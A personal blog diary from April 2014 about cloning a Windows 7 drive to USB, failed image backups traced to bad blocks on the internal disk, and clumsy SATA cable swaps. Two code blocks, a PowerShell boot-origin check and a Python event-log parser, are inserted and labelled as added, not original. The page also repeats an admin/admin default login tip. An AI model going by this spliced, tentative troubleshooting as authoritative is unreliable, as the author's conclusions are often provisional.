MsConfig.exe --- Boot screen shows the two entries (with my names) of the EasyBCD boot options.
Note it shows the 'current OS' is the OS of the USB clone drive (success I think)

USB clone drive now booting (4/3/14)
        I am coming to believe that finally, after two to three days of work, I have made a USB clone drive that now can, and has as I write, booted my computer. The version of the Windows OS on the clone drive is running the computer. And this was done without pulling the internal hard drive cable or physically disconnecting it in any way. Note that the MsConfig boot screen above says exactly this: 'current OS' is my entry for the USB clone drive.

        This is what I did to get the clone backup drive working to allow recovery if Windows 7 on the internal drive gets sick or crashes:

                    1) Clone the internal 700 Gbyte drive (using Casper 8) to the 1 Tbyte drive connected to a USB port (via sata to USB converter)
                    2) Manually mark the USB clone's (disk 1) 100 Mbyte System partition as 'active'
                    3) (optional, I hope) Utility 'Control EasyBCD' for dual boot selection between the internal OS or clone OS, and to verify which OS is running

My misunderstanding?
        I had assumed that if the clone OS booted, then its version of the c:\ directory (normally the f:\ drive) would show up as c:\, but it doesn't; it is still the f:\ drive, which is why for a long time I have not thought it was booting. Is this OK? Well, it is not a clean transfer of control. I guess I can go into the f:\ directory and run programs off the clone. The problem I see is that all the shortcuts on the desktop still point at the c:\ drive, which (by test) looks to be the internal drive and could be sick. So this is my current understanding:

How to use a clone drive
        OK, I have an external USB clone drive that seems to work. At least using the utility EasyBCD I can boot from it, and presumably with more testing I can verify that I can boot from it by changing the bios drive order. What can I do with it? Is it only useful as a replacement drive, which requires opening the case and physically moving cables? This may be no big deal on a well lit lab bench, but is a real hassle at home when the drive is on the floor sitting in a tangle of wires and not well lit. No, there's another use, a very important use: data recovery! An Apple article on cloning mentioned data recovery and this use had not occurred to me.

Data recovery with a clone drive
        I had been thinking that the only use of a clone drive was as a replacement for a bad (internal) Windows or a bad internal hard drive. There would be the hassle that all the user data files would be old (as of the date of the clone), so they would need to be replaced later from backup media (if such newer files exist, which they probably don't). I now think this is the wrong way to think about it.

Updating the clone
        Most articles speak of a clone as a 'snapshot in time', and when it is swapped in for the original all your programs and data revert to the date the clone was made. But this is misleading. I am pretty sure data files on the clone can be updated while it is external using Windows Explorer, and it will still work properly when swapped in. It is not a gem that can't be changed. When the clone drive is connected via USB, its version of the c:\ directory shows up as the f:\ directory. To Explorer the clone drive is just another external drive that can be read from or written to. I don't see why there would be a problem writing new data files on the clone. Explorer is not going to overwrite its system files! (Changing programs on the clone, however, is a totally different matter and I suspect should be avoided unless you are an expert.)

Data recovery
        With the perspective that updating clone data files is OK, the first objective should be to try and copy the latest version of the data files from the internal drive to the clone so when it is swapped in, you will really be back to normal. The clone is probably already connected to the computer via USB, so just leave it there and leave the internal drive connected too. In other words physically do nothing (easiest option). Power up, changing the boot order sequence to boot from the clone. The OS running is now the Windows files from the clone drive. From a few tidbits I picked up I think (not having tried this yet) what Explorer will do is this:

            a) Internal disk drive working  --- Explorer's c:\ drive will be the original c:\ drive files read from the internal drive. The older snapshot of c:\ files on the clone drive will show up in Explorer as a higher letter, in my case as the f:\ directory.

            b) Internal disk drive not working --- Explorer's c:\ drive will be the snapshot of the c:\ files as of the date the clone was made (or last updated).

Desktop puzzle
            However the above scenario omits a crucial detail: the desktop. My tests show that what appears is the original desktop, not the clone date desktop, which I find surprising. What happens if the original desktop is messed up, doesn't appear, is blank? In fact when I run a test shutting off the desktop icons (right click desktop background, view, uncheck 'show desktop icons') and boot from the clone, the desktop comes up BLANK. This could easily happen with a sick Windows, so how then do you run Explorer from the clone to recover data files from the internal drive? (see below 'Get to Explorer')

        You can't really run the computer, at least not cleanly, from the clone if the old desktop comes up. All its shortcuts point to the c:\ drive, which if the internal drive is functional will be programs on the internal drive. Can you run programs off the internal drive from Windows running off the clone? I just don't know, but it sounds risky. I suspect the right procedure is just to try and recover data files, maybe copy over some programs, and then swap in the clone for the ailing internal drive.

Get to Explorer
        Here's an option that might work if you boot from the clone and get no desktop. Try ctrl-alt-del to get to Task Manager; under File, New Task (Run), type 'Explorer'. (There is also a browse button here that opens Explorer.) When I do this with a healthy internal drive, Explorer starts and I can see the internal c:\ drive and the clone f:\ drive, so I could do data recovery to the clone. Unfortunately I can't verify that the Explorer I am running is really from the clone's version of Windows, or that it would start if Explorer were broken in the internal drive's Windows.

Explorer c:\ files from which physical drive?
       I was initially puzzled, when I booted from the USB clone with the internal hard drive still in place and working, that the clone's version of the c:\ files show up as the f:\ drive, but thinking about this it's probably the most logical thing for Explorer to do. It makes it clear during data recovery what to copy to what. If Explorer did the opposite and showed the booting clone's (old) c:\ files as c:\ and the (newer) internal c:\ files as f:\ it would be horribly confusing.

        My understanding now is that Explorer will display as c:\ the files from the internal drive (if present). The files from all external drives, even if the computer booted from an external drive, will show up as other letters. (If there are two internal drives, both connected by sata cables, I don't know what happens. There must be some way of designating one as primary and one as secondary.)
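
        The two questions raised above ('is the Explorer I am running really the clone's?' and 'which physical drive is behind c:\?') can be answered directly, without pulling cables or listening through a paper tube. The PowerShell script below is an added example, written for this page rather than taken from it or from Casper or NeoSmart. It reports the Windows folder the running kernel was loaded from, the path of the running explorer.exe, and, by walking the WMI association classes from drive letter to partition to physical disk, the model, serial number, size and interface (USB vs. on-board) of the disk behind each letter. The letters C: and F: at the bottom are the ones this page uses and are assumptions for any other machine. The reason letters alone mislead is that Windows assigns them from the registry of whichever OS booted, and the clone carries a copy of the original's registry, so C: keeps pointing at the internal disk either way; the Windows folder of the running OS is the thing to look at.

```powershell
# Added example (not from the page): find out which physical disk the running
# Windows instance came from, independent of what letter Explorer shows.
# PowerShell 2.0 / Windows 7 idioms; read-only, no admin rights needed.

function Get-PhysicalDiskForLetter {
    param([string]$Letter)   # e.g. 'C:' or 'F:'
    # Logical disk -> partition -> physical disk through the WMI association classes
    $part = Get-WmiObject -Query ("ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='" + $Letter +
        "'} WHERE AssocClass=Win32_LogicalDiskToPartition")
    if (-not $part) { return $null }
    $disk = Get-WmiObject -Query ("ASSOCIATORS OF {Win32_DiskPartition.DeviceID='" + $part.DeviceID +
        "'} WHERE AssocClass=Win32_DiskDriveToDiskPartition")
    New-Object PSObject -Property @{
        Letter    = $Letter
        DiskIndex = $disk.Index
        Model     = $disk.Model
        Serial    = $disk.SerialNumber
        Interface = $disk.InterfaceType   # 'IDE'/'SCSI' for an on-board SATA disk, 'USB' for the USB-attached clone
        SizeGB    = [math]::Round($disk.Size / 1GB)
    } | Select-Object Letter, DiskIndex, Model, Serial, Interface, SizeGB
}

function Get-BootOrigin {
    # The decisive check is the running OS's own Windows folder: F:\Windows
    # here means the clone's OS booted even though the internal disk still
    # owns C:. The explorer.exe path shows which copy of Explorer is running.
    $os = Get-WmiObject Win32_OperatingSystem
    $sysLetter = $os.SystemDirectory.Substring(0, 2)      # 'C:' or, if the clone booted, 'F:'
    $explorer = Get-Process explorer -ErrorAction SilentlyContinue | Select-Object -First 1
    $explorerPath = '(explorer.exe not running)'
    if ($explorer) { $explorerPath = $explorer.Path }
    $osDisk = Get-PhysicalDiskForLetter $sysLetter
    New-Object PSObject -Property @{
        SystemDirectory = $os.SystemDirectory
        ExplorerPath    = $explorerPath
        OsDiskIndex     = $osDisk.DiskIndex
        OsDiskModel     = $osDisk.Model
        OsDiskSerial    = $osDisk.Serial
        OsDiskInterface = $osDisk.Interface
        OsDiskSizeGB    = $osDisk.SizeGB
    } | Select-Object SystemDirectory, ExplorerPath, OsDiskIndex, OsDiskModel, OsDiskSerial, OsDiskInterface, OsDiskSizeGB
}

# Usage
Get-BootOrigin | Format-List
# Side by side: which physical disk backs each letter this page talks about
'C:', 'F:' | ForEach-Object { Get-PhysicalDiskForLetter $_ } | Format-Table -AutoSize
# The BCD entry the boot manager used, with the partition its 'device' and
# 'osdevice' fields point at (this is what EasyBCD and msconfig are editing)
bcdedit /enum "{current}"
```

        If the clone really booted, SystemDirectory reads F:\Windows\system32, OsDiskInterface reads USB and the size matches the 1 Tbyte drive; the C: row in the side-by-side table still shows the internal 700 Gbyte Seagate, which is exactly the 'not a clean transfer of control' situation described above. The bcdedit line needs an elevated prompt.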

Boot time tests
        As part of my checkout of the Casper 8 (bootable?) backup, I did boot timing tests. I suspected boot time was affected by USB devices, so to start I pulled all USB devices out (drives, printer, and TV tuner). The boot time was the same with the internal drive and also with the external USB drive selected, though I don't know yet whether it is really booting from it. The plan should be to add the USB devices back and again time the boot, starting with each USB device alone, then together. I later found in the drive group the internal Seagate drive was after one of the 2 Tbyte USB drives, so I fixed that. Boot time:

                        No USB devices                50 - 55 sec
                        All USB devices               1 min, 15 - 30 sec       (after setting internal hard drive #1 in HDD group)

        With the rearrangement of the boot sequence (F10) (and the EasyBCD boot loader in), boot is quite fast and the weird delay is gone; Restore starts in a few seconds.

Opening HP desktop case
        For the first time since I owned this HP Windows 7 computer I opened it up. Not a fun job, since it sits on the floor wedged between my old XP machine and a power supply for my old HP scanner, with a USB Canon scanner sitting on top. Had to move the top scanner and PS. Pulling off the side panel was easy once you know how. Remove one screw (rear, center, left), grab the sort of handle next to it and pull back a little (to clear a holding tab) and the right side panel (as seen from the front) just lifts off. I then just tipped the computer on its side so I didn't have to remove the outside cables, and it should be fairly easy to close up again.

Fans
       First surprise is I find two (maybe three) large fans inside. I have always considered the HP whisper quiet; this is one reason I buy HP. Occasionally I hear high fan noise, so the fans must be variable speed and normally run slow and quiet. Even with the cover off I can see them running, yet I can barely hear them. One fan sits on top of the CPU heatsink on the motherboard; a slightly larger case fan is mounted on the lower rear air grate. I suspect there is a 3rd fan on the top rear grate to cool the power supply, but it would be inside the PS box and is not visible.

Sata
        Yup, as expected the internal Seagate hard drive is a sata type. It has the same two cables (power cable and sata data cable) that connect up like my external 1 Tbyte sata drive. The power supply cable is four wire (yel, black, red, black) that comes from the power supply bringing in +5V and +12V. The internal sata (serial) data cable is just like the sata cable that came with the kit, a flat small red cable with distinctive corner shaped polarizing locks, and it goes to the motherboard.

        ** Yikes, I just found out my kludgy kit power wiring to the clone drive is very marginal. When I just touch the cable, I get a USB connect sound and leds flash. The power connector never did seat correctly and is clearly very marginal!!

Pulling the sata cable
        Pulling the sata (data) cable from the internal hard drive to the motherboard doesn't look easy (no surprise here). Unfortunately with the case open and the computer lying on its side, the outside, visible drive connector is the power supply cable (same orientation as my 1 Tbyte clone drive). The drive sata connector is inside the power supply connector and not visible with the limited line of sight I have with the computer lying on the floor in poor lighting. Disconnecting and connecting it would be blind, by feel. Disconnecting the hard drive sata cable at the motherboard does not look attractive either. At least it is visible, but it's on the motherboard and getting a hand in there to grip it without disturbing the adjacent optical drive sata cable doesn't look easy; still, it is on the outside and might be possible. So far I haven't tried disconnecting the sata cable. I need to figure out how to make this process simpler to make a clone backup strategy really work.

        One thought is to buy sata extension cables on Amazon and put them in and leave them in. With a longer sata cable containing a connector, the clone drive can much more easily be quickly swapped in and/or the internal drive can be disconnected and the clone run via USB. I first thought of looping the sata cable outside the case, so I would not need to open it to quickly get the computer functional, but this doesn't look practical. For one thing it means the case side panel cannot be reattached. For another a critical cable would be outside and subject to damage, and the sata cable is pretty stiff so it will require a large outside loop. Forget about this.

        An inside sata loop with a connector can work. It really only requires that the right side of the computer be accessible. I know now how to pop off the right side panel. It would be a good idea to also have on hand a plug-in power brick (or enclosure) to power the clone disk drive (2A +5V and +12V) and allow a long sata cable to be connected. This should allow the computer to run normally since it would have as usual a single drive connected via sata, but without the hassle of mounting the drive physically in the drive bay. I have a hard drive brick now, it was part of the kit I bought, but the power connector is poor and the connection marginal. (Don't know if it can be fixed.)

Clone drive tests
        I can find nowhere (hours of searching) any discussion of whether or not a USB clone drive can be changed, except of course by a differential clone update by the same clone software that created it. I suspect it can be changed a lot and would still work as a clone. Could it not for example have its user data files updated by Explorer? I don't see why not. I am going to run some tests.

        *  F:\windows\explorer.exe   ---- Running this brings up Explorer. (I added a shortcut to this f:\ drive explorer on the desktop)
        *  Copied the above explorer.exe and put it in the f:\ root and it runs. Renamed it in the f:\ root 'explorer-fulton.exe' and it runs.
        *  Copied a 5 Gbyte video (1 hr Doc Martin) to the f:\ drive. It runs in KmPlayer, explorer on f:\ still runs and a .png image I added post clone is OK.

        Conclusion so far: programs on the clone run, and writing files to the clone does not seem to adversely affect it. A newly added video plays and other images and programs on f:\ do not seem to have been affected. Nothing vital seems to have been overwritten. This does not surprise me. It should have a normal Windows file structure and when written to by Explorer new files should go into blank sectors.

Could a 2nd drive be mounted inside?
        Probably, though I am not sure this is helpful. I can see where the sata cable from the hard drive plugs into the motherboard. There's a 2nd sata cable (from the optical drive) plugged in next to it, and adjacent to these two there appears to be an open sata connector. It is adjacent to the other two, same size and same corner polarizing. However, getting in there to plug in a 3rd sata cable looks to be a bitch! There are open power supply cables bundled up. The complex metal cage with a couple of levers on the side where the hard drive is mounted (top) has extra space below, but I would need to find a video or HP article to figure out how to open this up. No longer are drives just screwed into a simple cage.

Trying to do Windows image backup of clean system (4/4/14)
        With a newly installed version of Windows 7 (now) running well I decided to give Windows image another try. Also, as I wrote above, maybe now I know the trick to get a USB drive to be recognized. I got smarter and have made backup of my internal drive easier by not storing captured TV shows on it. These files are huge and had earlier filled up most of my 700 Gbyte drive. My c:\ drive now has about 50 Gbytes, so the image file size this time is about 1/10th of the 640 Gbytes of the previous image and correspondingly should take only about 1/10th the time to write.

        I shut everything down, disconnected the clone USB (because the power connector is loose), restarted and began the image backup, and didn't further touch the machine. I checked it after 10 min and it was about 40% done and chugging along, so it looked like it was only going to take 20-30 minutes. So I go to bed only to find next morning a big red bar with the message 'image failed', 'device is not ready'. That's it! No click here for details, no log, doesn't recommend deleting the partially written image file, doesn't even tell you its name or size so you can find and delete it, no recommendation to check the hard drive for errors, nothing! This is Microsoft to a tee. They don't give a shit. This is not an obscure tech tool, this is the primary image backup intended to be used by everybody, and this is the help you get when things go wrong, totally user unfriendly. When I checked, I found this useless backup file wasting 45 Gbytes of space on my backup #2 USB drive. Deleted it. I'm going to try it again.

2nd try
       Well, I tried it again and it failed again. I saved it to the same 2 Tbyte #2 My Book USB drive, this time during the day so I could watch. This time before I started I further slimmed down c:\ by removing 8 Gbytes worth of captured TV shows. Started at 3:03 pm (it makes a restore point at this time when it starts), OK at 3:20 pm still going, but when I looked at 3:36 pm the file size at 45 Gbytes was not changing, and a few seconds later I see the message screen go from 70% green to 100% red with the same error message: image failed, device not ready. Both times it writes 45 Gbytes to my new My Book 2 Tbyte drive and stops, reporting the USB drive is 'not ready'. (Update --- I found out the 45 Gbyte file size is a FAKE. When the image backup starts this size is immediately shown; it's the expected final size and does not change as the file is being written.)

        Yikes, more backup problems! As usual it's complicated. Is there something wrong with my new 2Tbyte drive, or is this a problem with Windows image backup? This would be the biggest file ever written to USB WD #2, but I have had no other indications that there is any problem with it, and as part of my backup work this drive has been error checked (by different programs) several times and always passed.

        I am going to run chkdsk on the drives and do the Windows image backup one more time, this time saving it to USB WD 2Tbyte drive #1, where the old 600 Gbyte image of the unstable Windows is. Ran two error checks on USB 2Tbyte #2 and no errors found!

3rd try --- AMD Raid error seemed to trigger write failure
        Image backup failed again, 3rd time. This time wrote to J:\ drive, WD 2 Tbyte #1. Failed at the same time, same error, but this time I noticed something, a strong clue to where the problem is. Just about the time the backup failed (about 35 min in), in the lower right corner an AMD RaidXpert Error flashed (and of course disappeared in a few seconds). I have been seeing this error message pop up occasionally since the new install, but nothing seemed wrong and I am not using Raid (as far as I know), so I ignored it. At this point I know nothing about Raid, so I have no clue as to how to fix it. Can't believe I am using Raid since I have only one hard drive. I have run extensive HP diagnostics on my whole system and it never reports an error. This says AMD RaidXpert, so it smells like a deep error, like some CPU function is switched on that shouldn't be.

PC magazine article on Windows 7 image backup (2010)
        Author says positive stuff, then I find this: 'It's a little picky about doing image restores' and he wouldn't use it. Oh, yes a ringing endorsement. Christ, a backup program that doesn't reliably restore is worse than useless!
RAIDXpert (4/4/14)
        Off on another adventure deep into tech land. My new installation has a problem with AMD RaidXpert that needs fixing. It is preventing Windows image backup from writing a 50 Gbyte backup image file to either of my 2 Tbyte USB backup drives. Surprisingly it shows up when I type 'raid' in the Windows search box, but up comes a local AMD page that asks for an ID and password. Online the suggestion is to try: admin (lower case) for both ID and password, and this WORKS. This page has a log list and all it shows are 'warnings' for the internal Seagate 700 Gbyte drive. The only change I made on this page is to shut down the notification. Not sure if this is smart as this gives me the clue as to what is wrong.

        I can certainly believe that Windows image is so delicate that it shuts down when it sees a Raid 'warning', even though the warning is spurious.

Forum postings

        "The RAIDXpert is a remote RAID configuration tool, for changing the RAID level of the RAID setup connected via SATA 3.0 Gbit/s ports (connected to SB600, excluding extra SATA 3.0 Gbit/s ports through additional SATA chip on some motherboard implementations), including RAID 0, RAID 1, and RAID 0+1."  (This seems to have no use to me. My machine doesn't even have USB 3 ports.) I'd just uninstall it, says the poster.
        A little googling shows this is a crazy problem that a lot of HP owners are complaining about. Raid is only for multiple drives, so it is clearly some sort of setup problem HP (or Windows) has. One poster said he had been getting five or six warnings like this a day for years and as far as he can tell they mean nothing. I didn't see an expert answer, but there are two ways it can be shut down (see below).

                1) Msconfig has a list of services. It is shown here running, but on this page the service can be unchecked and stopped.
                2) AMD RaidXpert is a program that can be uninstalled. There are other more low level looking AMD programs on the list that I wouldn't dare touch.

        I did the first and stopped the service. This is less risky than uninstalling, as it can always be restarted.

        RaidXpert forum
         http://h30434.www3.hp.com/t5/Desktop-Hardware/AMD-RAIDXpert-Warning-Errors/td-p/342708

4th image backup try --- fails again (4/4/14)
        I thought I had it. I thought shutting down the AMD Raid service would clear this error, but it made no freaking difference! The write failure occurred exactly as the previous three times, about 35 min in with the same error message that 'device is not ready'. I confirmed before I started that the RaidXpert service, while still installed, is not running.

        I have another idea. I downloaded a few days ago the 'Advanced USB port monitor' program. The drives I am writing to are on USB ports. Might it be affecting the USB ports? The program is not running, but I see it listed (somewhere). It may either have a service running or perhaps it has installed USB drivers that are causing problems. I'll work this.

5th image try --- Going to Casper 8 ---- Another fail!
        I am giving Casper a try at writing an image backup file. I selected it to do a standard backup file. (The other option is its own version that it can incrementally update.)  Writing the image file to 2Tbyte drive #2.  It is writing the file now. Format is .vhd, so it's probably a standard Windows image file. Windows, if it had ever gone more than 35 min, would probably have taken a little less than an hour. It looks like Casper is a little slower, 33 Gbytes/hr, so probably an hour and a half or so to write 50 Gbytes.

        Shit, this is really serious. I thought I had a clean system, now I find I can't write a 47 Gbyte file to USB drives to do an image backup. Casper went for an hour and 19 min writing 44.4 Gbytes on 2 Tbyte #2 (My Book) and then shut down on an I/O error. Unlike Windows it brings up a long list of suggestions and links to diagnose the problem. The general tone is that this is a serious disk problem.

        The link to the Windows [Event Viewer, Custom views, Administrative Events] shows a long string of Errors. The errors during this copy are reported as:

        10:27:55             Filter Manager failed to attach to volume '\Device\HarddiskVolume16'.
        10:27:55             Filter Manager failed to attach to volume '\Device\HarddiskVolume14'.
        10:27:50             Disk -- The device, \Device\Harddisk0\DR0, has a bad block.
          9:10:02             Disk -- The device, \Device\Harddisk0\DR0, has a bad block.
          8:32:44             Disk -- The device, \Device\Harddisk0\DR0, has a bad block.
          6:20:24             Disk -- The device, \Device\Harddisk0\DR0, has a bad block.

        Ok, a strong clue here. Each of the image copies failed with the above Disk error (which precedes the screen image fail message by just a few seconds), and Disk 0 is normally the internal drive (700 Gbyte Seagate). This would explain why it doesn't matter which software is doing the backup or which USB drive is being written to, and why the failure occurs at about the same point. There's a bad block on the internal Seagate that can't be read!
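The reasoning in the paragraph above (a Disk bad-block event on Harddisk0 a few seconds before each backup failure, regardless of target drive or backup program) can be turned into a small triage script. This is an added example, not code from the essay; it runs over constructed event lines written in the same "time  source -- message" layout as the list quoted above, and the failure time passed to it is likewise an assumed value.

```python
import re
from dataclasses import dataclass
from datetime import date, datetime, timedelta
from typing import Dict, List, Optional

# Constructed sample in the "time  source -- message" layout used in the essay;
# illustrative lines only, not an export of any real event log.
SAMPLE_EVENTS = r"""
10:27:55  FilterManager -- Filter Manager failed to attach to volume '\Device\HarddiskVolume16'.
10:27:55  FilterManager -- Filter Manager failed to attach to volume '\Device\HarddiskVolume14'.
10:27:50  Disk -- The device, \Device\Harddisk0\DR0, has a bad block.
9:10:02   Disk -- The device, \Device\Harddisk0\DR0, has a bad block.
8:32:44   Disk -- The device, \Device\Harddisk0\DR0, has a bad block.
6:20:24   Disk -- The device, \Device\Harddisk0\DR0, has a bad block.
"""

LINE_RE = re.compile(r"^\s*(\d{1,2}:\d{2}:\d{2})\s+(\S+)\s+--\s+(.*\S)\s*$")
# Physical disk object named in the Disk source's bad-block message, e.g. \Device\Harddisk0\DR0
DEVICE_RE = re.compile(r"(\\Device\\Harddisk\d+\\DR\d+)")


@dataclass
class Event:
    time: datetime
    source: str
    message: str

    @property
    def device(self) -> Optional[str]:
        m = DEVICE_RE.search(self.message)
        return m.group(1) if m else None

    @property
    def is_bad_block(self) -> bool:
        return self.source == "Disk" and "bad block" in self.message


def _clock(hms: str) -> datetime:
    # All lines come from one day; anchor them to an arbitrary fixed date so they can be subtracted.
    return datetime.combine(date(2014, 4, 5), datetime.strptime(hms, "%H:%M:%S").time())


def parse_events(text: str) -> List[Event]:
    """Parse the quoted Event Viewer layout; lines that do not match are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(Event(_clock(m.group(1)), m.group(2), m.group(3)))
    return events


def bad_block_counts(events: List[Event]) -> Dict[str, int]:
    """How many bad-block events each physical disk produced (which disk is failing)."""
    counts: Dict[str, int] = {}
    for e in events:
        if e.is_bad_block and e.device:
            counts[e.device] = counts.get(e.device, 0) + 1
    return counts


def disk_errors_before(events: List[Event], failure_at: str, window_seconds: int = 60) -> List[Event]:
    """Bad-block events that fell in the window just before the backup reported failure."""
    fail = _clock(failure_at)
    lo = fail - timedelta(seconds=window_seconds)
    hits = [e for e in events if e.is_bad_block and lo <= e.time <= fail]
    return sorted(hits, key=lambda e: e.time)


def diagnose(events: List[Event], failure_at: str, window_seconds: int = 60) -> str:
    """One-line verdict: source-drive read error versus a problem on the target/USB side."""
    hits = disk_errors_before(events, failure_at, window_seconds)
    if not hits:
        return "no bad-block event within window; suspect the target drive, USB path or drivers"
    devices = sorted({e.device for e in hits if e.device})
    return "source-drive read failure likely: bad block on " + ", ".join(devices)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print(bad_block_counts(evs))
    print(diagnose(evs, "10:28:01", window_seconds=30))  # assumed failure time, 11 s after the Disk error
```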

 So what do I do now?
        * (update -- Nope, neither Windows (grayed out) nor Casper (geometry not supported) allows the USB clone to be the source drive.)
        Make an image backup from the f:\ clone! Took me a while to think of this, but if the f:\ clone is OK (?), it is clearly different hardware so I should be able to make an image clone from it. The only possible flaw in this ointment is that I have been playing with it, writing and deleting files from it using Explorer. It is worth a try, however, I will need another hard drive to test out the image.

6th image try (post chkdsk) -- Another fail
       * (update --- ran chkdsk on internal Seagate 700 Gbyte overnight, with check mark for 'scan and try to recover bad blocks'. Windows image backup is running now, we will see if it throws an error in 15 min. It did; chkdsk did not help.)
        One thought is to do a full sector disk scan with an attempt at recovering bad sectors using either chkdsk or maybe the HP disk utility. This will need to run overnight as it takes hours. (No hint in error messages as to which file has the bad block.)
        Another thought is that 1/3rd of the hard drive appears to be useless stuff, it did not get copied to the clone, see JdiskReport. It could be the bad block is here. Maybe this stuff can be moved or deleted.

        * Much more risky is to first do another disk clone to the 1 Tbyte drive (which I have been modifying) and which of course may fail and will have some errors. Then format and/or scan the Seagate internal to try and clean out the bad sector.

        ** Less risky but more difficult would be to swap in the new clone (or existing clone, as a new clone may fail!) drive permanently and use the 700 Gbyte as an outside clone backup. This makes sense in that the old Seagate has a lot of hours and hard use on it and it is probably smart with the case now open to swap in a new drive.

        ** For a drive swap to work I need to buy $100 worth of stuff:
                            -- buy another internal sata drive (important if I am going to retire or can't trust the internal 700 Gbyte Seagate)
                                              An important issue is sata speed (sata I, 1.5 G; sata II, 3 G; sata III, 6 G).
                                              Bios shows sata 1.    The Seagate Barracuda I have is sata III (6 G), backward compatible with sata II (3 G), but not sata I.
                                                    This is probably why it is not recognized, however, it can be slowed down to sata I by adding a jumper.
                            -- buy one (or two) metal enclosures for a single internal 3.5" sata drive. These include an external power supply brick (12V) and a sata to USB translator, so essentially for $20 it is the same two components now running the 1 Tbyte Seagate on the floor, but in a metal box. Includes a power switch but unfortunately no led activity light. Choices are USB 3 or 2, check the max drive capacity is at least 2 Tbytes.

                            -- No need, 18" sata cable came with 1 Tbyte Seagate drive
                                        18" Sata cable so I can try a clone drive without mounting it inside (using external power)
                            -- Nope, dual docking stations aren't good long term. Internal drives have exposed PC boards, they need to be in an enclosure to keep the dust off.  Dual enclosures don't make sense either. All (two) of them spin down the drives after 5 min of inactivity, and this cannot be turned off! The problem is heat, even though some of them have fans. I read 7,200 RPM drives (like the new 1 Tbyte Seagate) put out more heat than the 5,400 RPM types.
                                       buy a dual sata dock (with cloning)

Researching how to image (or clone) with bad blocks
        Here is Microsoft guy responding to this question on a forum:

        "System image backup is resilient to bad sectors (we would not backup the bad sectors but try to backup the rest). File backup is not. Can you run chkdsk on the volume before attempting to backup? Ideally if bad sectors are determined and marked before backup begins, backup would not try to read them and hence it should succeed." (poster says he ran chkdsk and the backup still failed) Other Microsoft experts say the opposite, "According to Minasi, the image backup program in Windows 7 has no option to skip over bad sectors."

        "System image backup supports only backing up NTFS volumes. Note that this is not an imaging solution like (Norton) Ghost. It is still a backup solution (we create a shadow copy of the volume before backing up and backup only the used blocks from the source). Since the backup can be used to restore back your system (Bare Metal Recovery), it is termed as system image."

        Image backup failure details are in this log: %windir%\Logs\WindowsBackup\*.etl

Doubts on EasyBCD dual boot
       Looking at the disk error log, most errors and (all?) bad block errors have been in the last few days, which is after I installed EasyBCD on 3/31/14. Maybe I should uninstall it, or at least switch the msconfig boot option to normal.

Swapping in the clone (4/5/14)
        Clone did not boot  --- message on screen is 'no operating system'.

        Let me describe my little misadventures in physically trying to swap in the clone. I am working with the computer on its side on the floor in a not well lit area. I have limited foot room, am bending over, and with my bifocals I cannot see well what I am doing (too far away for the close up lens, but too close for the distance lens).

        First mistake: HP sata connectors are not like my 18" cable that came with the new internal drive, but I don't know this. My clone sata cable is a simple straight in plug (with corner polarizing key like all sata connectors), but the HP sata connectors, I later find out, have a little side latch that needs to be pressed in to release the connector. I get it out, but I have pulled and rocked the motherboard mounted connector awful hard.

        The drive sata connector is a top side mounted motherboard connector. Even though things are still working I'm really worried that I might have affected the reliability of the computer by loosening or damaging the electrical connections between the connector and motherboard.
        I plug in the 18" cable from the new 1 Tbyte lying on the floor (powered by brick) to where the DVD had been (not knowing this) and hit the power button. It boots, everything looks normal, I am very pleased the clone goes in so smoothly, too smoothly. I soon realized that even changes made this morning and just a few minutes ago when Windows updated are showing up. The clone is a week or so old. And I get messages that a drive (clone) has been detected but it needs to be formatted. This is weird.

        Second mistake: I now realized that I have pulled the wrong HP sata cable, the DVD cable, and plugged in the clone there, so there were now two internal drives. Somehow I just assumed the top cage with the fancy latches was the hard drive and the box below was the DVD drive. Of course, if I had given it two seconds thought it would have been clear this is wrong. The DVD opening is at the top of the computer, the Seagate hard drive has to be the box (marked Seagate!) in a cage at the bottom. So I pull the 2nd sata cable, again way too hard, because I don't really know what to press or how to press, and plug the 18" sata cable there.

        Clone is now connected to where the old drive was with both HP sata connectors loose. I power up and now I get the message at the beginning of boot, 'no operating system'. So I pull the clone cable out of the motherboard and put the internal hard drive cable back where it was. I take the 18" cable and plug it into the sata to USB converter, the other end already connected to the drive. I pray a little, and press the power button. The computer boots normally, so the motherboard hard drive connector and hard drive cable are OK.

        I should be back to normal, but I am not. The two directories from the clone USB drive are missing. This is where I am now. The only hardware difference is that I am using the 18" sata cable vs the 6" corner sata cable to connect the 1 Tbyte drive to the sata-USB converter. Is the 18" cable bad? It didn't take any abuse, it was the HP cable and motherboard sata connectors that took the abuse. I checked and the 18" cable is secure at both ends. I changed back the clone to the original 6" right angle cable and still no f:\ drive. I am now worried that plugging in the drive as a 2nd drive has damaged it. It apparently, as a 2nd drive, could not be read as I had a popup window saying it needed to be formatted, which I of course cancelled.

        Now back to exact same configuration as this morning, still no f:\ drive, but when I go into disk configuration screen there it is, all three partitions and all healthy. What has happened is that the clone partitions have lost their letter assignments. I suspect if I reassign them letters I will be back to normal (yup), but it brings up the question does the clone need to be set up before it goes in? It went in with assigned letter of f:\ and system marked as active. I could select it as a dual boot and disk configuration was telling me that the OS was running from the clone. It was my understanding that the system when only a single drive is present would just assign letters c:\ and d:\. So with this info it is likely the 18" cable is OK, but I need to put it back to confirm it.

So what's the problem with the clone?
        From a YouTube video (hard drive won't boot) I picked up a couple of ideas: Least likely is that I did not have the DVD plugged in with the clone, but I think we can rule this out, because the machine booted with the internal hard drive in and the DVD sata cable still out with no problem. Much more worrying is a speed mismatch between the motherboard sata and the drive sata. There is sata I (1.5 Ghz), sata II (3 Ghz), and sata III (6 Ghz). He said you can plug a sata II hard drive into a sata I motherboard and it will (or can) not be recognized! In other words the question is can a new drive be too fast for an older motherboard? Is sata backward compatible, for example will a drive start at sata I speed and then upshift? Is there some way to slow down a new, faster sata drive to be compatible with an older motherboard? He goes on to praise the usefulness of the sata-USB adapter. One advantage he says is a fast sata drive that is not recognized when plugged into a sata connector will work using a sata-USB adapter.

        I had forgotten that my original hope was that I could just disconnect the internal hard drive and boot from the USB clone. I haven't tried this. For this test I can disconnect the sata connector at the internal drive, or even pull the power connector from the internal drive.

        Damn --- Disconnected the power cable from the internal drive and connected the clone via USB. It will not boot. Played with bios order putting it first and still no boot. Its system partition is there and marked 'active'. Don't understand. With the internal hard drive in place disk configuration tells me the OS has come from the USB clone.

